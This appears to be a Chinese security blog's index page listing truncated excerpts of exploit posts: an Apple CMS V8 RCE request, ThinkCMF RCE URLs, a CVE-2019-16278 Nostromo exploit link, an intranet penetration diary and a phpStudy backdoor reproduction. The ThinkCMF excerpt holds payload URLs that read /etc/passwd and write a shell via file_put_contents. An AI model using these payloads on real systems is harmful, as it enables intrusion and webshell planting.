苹果CMS V8 绕过前台RCE

POST /index.php?m=vod-search HTTP/1.1 Host: word.o2oxy.cn Content-Length: 500137 Cache-Control: max-age=0 Origin: http://word.o2oxy.cn Upgrade-Insecure-Requests: 1 Content-Type: appl...

ThinkCMF RCE

http://127.0.0.1/?a=display&templateFile=/etc/passwd Getshell http://127.0.0.1/?a=fetch&tem%20...%20%27%27&content=%3Cphp%3Efile_put_con...

CVE-2019-16278

https://github.com/jas502n/CVE-2019-16278 Exploits for CVE-2019-16278 and CVE-2019-16279 Nostromo httpd is prone to 2 cricital vulnerabilities for versions <= 1.9.6 (0day =]) firs...

记一次内网渗透

无意中拿到了一个shell 然后花了几天内网渗透。还是有点收获的 没啥技巧可言了。都是一些瞎操作了。别喷就行了 先介绍一下环境把  WEB: 内网主机 192.168.1.231   (无域...

phpStudy 隐藏web后门复现

GET / HTTP/1.1 Host: 192.168.1.16 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63....